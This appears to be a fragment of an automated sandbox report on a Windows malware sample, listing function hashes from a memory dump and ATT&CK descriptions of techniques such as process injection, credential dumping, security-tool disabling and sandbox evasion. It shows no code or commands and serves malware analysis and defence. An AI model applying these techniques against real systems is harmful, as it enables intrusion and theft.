Opcode Fuzzy Hash: 9ef0d11af899a83344bbb62f714ad150e5f3bf4afdc557489d1258b0ac2e5c3c
Instruction Fuzzy Hash: 0981B230609A8C8FDBA8DF28C8557F937E1FB59315F04423EE84EC72A2CA759941CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC08D0 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a218bf238e67f39b61d6a91607f8661d9edfe119ac1a70d592f1d771a48430a
Instruction ID: 001b88d40aebecb357da72f7bbbd10f880e4c485f6e6cb79cedf71df50c0236b
Opcode Fuzzy Hash: 1a218bf238e67f39b61d6a91607f8661d9edfe119ac1a70d592f1d771a48430a
Instruction Fuzzy Hash: 5E413A12B0E59D1AE324B7BC64A55F97780DF5933AB0906FFE44ECB1E7DD1868418284

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0960 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff64bcb7423ab8a8d9871860e856a1f5b6d076b574d029809f25c2474439d7a1
Instruction ID: f084e3cf3882df455779fc731199b3d1f573b22531f643dc4269ef1a9ef3931f
Opcode Fuzzy Hash: ff64bcb7423ab8a8d9871860e856a1f5b6d076b574d029809f25c2474439d7a1
Instruction Fuzzy Hash: E3310611B0E55E1AE368B7BC686A9F967C1DF6932AB1501BAE80EC71E7CC5868418284

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0998 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17344eaee100d3e81a619ab8da6cfb6299e854d38660e1a449816aa722916c3f
Instruction ID: 6a885e69bd7508122c7b22bbd3920193b22752f5b1996ceb1156413fb45c1430
Opcode Fuzzy Hash: 17344eaee100d3e81a619ab8da6cfb6299e854d38660e1a449816aa722916c3f
Instruction Fuzzy Hash: 4F310560B0A94E1FE758B76C846AA7A77C2DF68315B1500BDE44EC72EBDD64AD018384

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC2FAB Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2ac7ef11806528771a0915fb540ff2e382c4a50135e1de05a1cb57472f380b3
Instruction ID: 7b09a22874cc483407b08f60cd42ac53db646162ba389b9b5ae80960ebe3bbcc
Opcode Fuzzy Hash: e2ac7ef11806528771a0915fb540ff2e382c4a50135e1de05a1cb57472f380b3
Instruction Fuzzy Hash: C531A521F0E50D5BEBF4F7A894666B873D1EF48700F1141B5D84ED31E2EDB86E414645

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0C25 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65660c21df12a1561b9d4658264d76d745d7dbe258dc238d2449aca0b12cbd65
Instruction ID: 7d10828f09806b4061899a2404671c7b8013c36efa8d3e667a2bb88bdf6fae29
Opcode Fuzzy Hash: 65660c21df12a1561b9d4658264d76d745d7dbe258dc238d2449aca0b12cbd65
Instruction Fuzzy Hash: E4312731B0E28D8EE731FBA898611FC7BA0EF52725F0542F7D0588B1D3D97826458785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC11A1 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 345dd3962a5aafd01b161de14e5a312662e76a4728ecdd53baee0bd59dfe041d
Instruction ID: 70d7226bc3d1e52a8c241595d4765c08dd13aa052c2776a7f46763eb2690ec61
Opcode Fuzzy Hash: 345dd3962a5aafd01b161de14e5a312662e76a4728ecdd53baee0bd59dfe041d
Instruction Fuzzy Hash: EB319531B0D64E8FDB59EB68C8689B97BF0EF66300B0545FFD009D72A2DA68A941C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d6ff9c110565a04a85bddbc322836c2d27d8e2b4c0c8d2272ea2f19872b959f
Instruction ID: bc6582fb7489aa6de9bd4119457e2f2c9ae156ee515b06a9097e335e50d5b3c5
Opcode Fuzzy Hash: 0d6ff9c110565a04a85bddbc322836c2d27d8e2b4c0c8d2272ea2f19872b959f
Instruction Fuzzy Hash: A111A335A0E68D9FE721EBA888611AC7FB0EF52611F0646F7C054DB2A3D97826458784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC6069 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a415f3c0083a705f81a9a19a68cf3e863f61fc972e37ff51622995e4e0d005
Instruction ID: a14280f02aa93014ba7b53afd776e2cf1f3de7022ac92b312e9bfff82a54c331
Opcode Fuzzy Hash: 67a415f3c0083a705f81a9a19a68cf3e863f61fc972e37ff51622995e4e0d005
Instruction Fuzzy Hash: 3F11CE31D0895DCFDB98EB88C454BB9B7E1EB68315F16417AD40EE72A4CA75AD80CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5adfc8f9e99f6782ce3cb13302a8af815426ed6a20fd7b545327e269a56cad
Instruction ID: c2cdbc9bc0481b32636779f24f15c4c54bb24575df3d2c08e4752a6cd98dede7
Opcode Fuzzy Hash: 2d5adfc8f9e99f6782ce3cb13302a8af815426ed6a20fd7b545327e269a56cad
Instruction Fuzzy Hash: 1711E131A0E28C8FE722EBA8C8601AC7FB0EF02710F0642F7C054DB2A3D93826458784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC60B1 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0a65b20a60797b31265f0731c71a80fa691e31ca22e83bf82759247642d54e9
Instruction ID: e6ffb3aa6ab722927cbd8040fd0e2b1f8789417fcf8023fb6e5f805b94637682
Opcode Fuzzy Hash: e0a65b20a60797b31265f0731c71a80fa691e31ca22e83bf82759247642d54e9
Instruction Fuzzy Hash: 4511DB31A0895DCFDB58EF88C494EADB7E1FB68310F554569D40EEB2A4CB74A980CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79e6fbbe4a7e37deb1f026f2445416a25eb6c3c58a8b56d0fb14798d23f01e17
Instruction ID: 727e7f838631ccc1b6664d7e240b007504c13bd369588668d6d7fe85f9a2f8bd
Opcode Fuzzy Hash: 79e6fbbe4a7e37deb1f026f2445416a25eb6c3c58a8b56d0fb14798d23f01e17
Instruction Fuzzy Hash: 5C019235A0E38D9FD721EBA4C8505AC7FB0EF06710F1641E7D454DB2A3D97866458780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f523b894484ff4966afc7270991b015528ff9c003e741d228bcebcb32f55382c
Instruction ID: 9525ca486276c97144514f8fedb3f180e4e449c881c6b15f432c7ca797b50c7e
Opcode Fuzzy Hash: f523b894484ff4966afc7270991b015528ff9c003e741d228bcebcb32f55382c
Instruction Fuzzy Hash: 6A018F34E0E38D9FEB21EBA488645AD7FB0EF06B04F1542E7D454DB2A3D9786A448744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC2FED Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa7a2c6e251d9073b022690c4b00c52a0da6a8cc65a20b707b9889aaa29c4e9f
Instruction ID: e4db3ded41197b00eb3fd0994b3b8e9b1499ee96856ba1053fd966e52d769c11
Opcode Fuzzy Hash: fa7a2c6e251d9073b022690c4b00c52a0da6a8cc65a20b707b9889aaa29c4e9f
Instruction Fuzzy Hash: 23018130A0950E8BEBB8BB94D8657F873A0FB44300F1140FAD84ED31A2DD782E868A44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC1772 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c51c26fe192268d88d71d385cbb7ae9f47048f477c5fbfe5ccb425c5f204870
Instruction ID: 88994b003d148971fb7dfccd753e9faafaea905e5bd2f6f7ffceb6800b8f05e6
Opcode Fuzzy Hash: 5c51c26fe192268d88d71d385cbb7ae9f47048f477c5fbfe5ccb425c5f204870
Instruction Fuzzy Hash: 57F02422F1D80A4BE368FB4C88255BD7392EFA0314F1583B4D11DCB2EADDAC6A0247C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d565068871bac3b5cb69d534464382431c8fbaae6d676d7fa47309588c7a367
Instruction ID: dc5f8c7092e723c19164b847316988a471300fad3c17e8ce668772afcc78eac6
Opcode Fuzzy Hash: 3d565068871bac3b5cb69d534464382431c8fbaae6d676d7fa47309588c7a367
Instruction Fuzzy Hash: B8F0E53564E94DCFDB81AB3DDCA44E5BB50EF06209B5616EAD088C7152E2115459C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC6143 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40e574aa5be8d028392a4911db46151dbc872fed293573e2adbba2e8d328267d
Instruction ID: bd3a6f3adef450fda5cd41556408e663802d050799441494084802631dbacd6d
Opcode Fuzzy Hash: 40e574aa5be8d028392a4911db46151dbc872fed293573e2adbba2e8d328267d
Instruction Fuzzy Hash: 07F0FE31A0851ADFDF54FB88C4A5EA977A1EB75300F0641A9D40ADB2A5DA68E944CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC4520 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c02679dedcb4ad0fa344f6915baa2bef2b77303a93a2e7f4e1287c10c033aa26
Instruction ID: 271cfbd7704580665cc9f42a53d35b08f358a0d7f337cad0aa5e91341851489c
Opcode Fuzzy Hash: c02679dedcb4ad0fa344f6915baa2bef2b77303a93a2e7f4e1287c10c033aa26
Instruction Fuzzy Hash: 07E09A20F0D51E8FFBB4BB54C8617BD62A1AFA4700F1600B4D54E933E2DEB86E818B45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC2EEB Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58e9e05d9cae39844b236ea94393e07d7ebdb3eec5ee4050d4c2e6874d79ad6
Instruction ID: fabc6a742c3775fbc717f102d7f4a1b03af0f59a97f4f785abd0430283596c1e
Opcode Fuzzy Hash: e58e9e05d9cae39844b236ea94393e07d7ebdb3eec5ee4050d4c2e6874d79ad6
Instruction Fuzzy Hash: B5E01211F5E54906F3BCB7AC04323B890819F98710F4A41BDE16ED37D3DD882D400396

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32abc24a2af8784e38a74eddc54c1cad52943b62232da69abc11039669d75d6b
Instruction ID: 97ddbfe2eb13c0eb2d242094c2fd151c4fc1e90e57ba3ca286de245d8e6fee8b
Opcode Fuzzy Hash: 32abc24a2af8784e38a74eddc54c1cad52943b62232da69abc11039669d75d6b
Instruction Fuzzy Hash: FCC08C00F0B40F00F83037EE14260BCB1005BC4A10FE30132D40C820E1ACDE22C5015E

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 482460c59fdaf1a52aed4f7491202002a242ac7410c70c8073e8193b1f05b9c3
Instruction ID: 77c869750e620185c3fda0075a8ea8c1f66927897d7ad6a965be4655c80c3269
Opcode Fuzzy Hash: 482460c59fdaf1a52aed4f7491202002a242ac7410c70c8073e8193b1f05b9c3
Instruction Fuzzy Hash: 77C04C305218098FC954FB6DC99595476A0FF0D215BD60190E40DC7171E65A9D95D741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC12E8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bee1142a36fa493392716e7fe6ef66c768009aff74f62eb87394c211b977359f
Instruction ID: 64080451543f0411ced6201682795e2999dce9d4b517cb74bb70fa079eff0081
Opcode Fuzzy Hash: bee1142a36fa493392716e7fe6ef66c768009aff74f62eb87394c211b977359f
Instruction Fuzzy Hash: 38C08C3051180C8FC908FB38C88582833A0FB09200BC20090E008C7170D26ADDC0C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 236b835dd14826d049446a4a3f15a42383580b9683cbdf440ead9472c701168a
Instruction ID: 1e5cc65d55e5c0919877ae19746e9b3beeb7da2578ce2261a32431fc47561b2e
Opcode Fuzzy Hash: 236b835dd14826d049446a4a3f15a42383580b9683cbdf440ead9472c701168a
Instruction Fuzzy Hash: FBB01200D5740F00E83433FA0856079B0405B44100FD20170D80C81091A8CE12D40257

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC4314 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2130b1f53515e79288f25483b48b67f0d578859ebd3e654ef6c595545a84133e
Instruction ID: bbe929e8cb7312fc67c0badc1eaf56c878fdab8f5a951d83d2f20d242dac0425
Opcode Fuzzy Hash: 2130b1f53515e79288f25483b48b67f0d578859ebd3e654ef6c595545a84133e
Instruction Fuzzy Hash: D4B01200F1D10900F23432F0045513C10010B51200F1BC832444E53192CC6C59011140

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Vqzx4PFehn.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

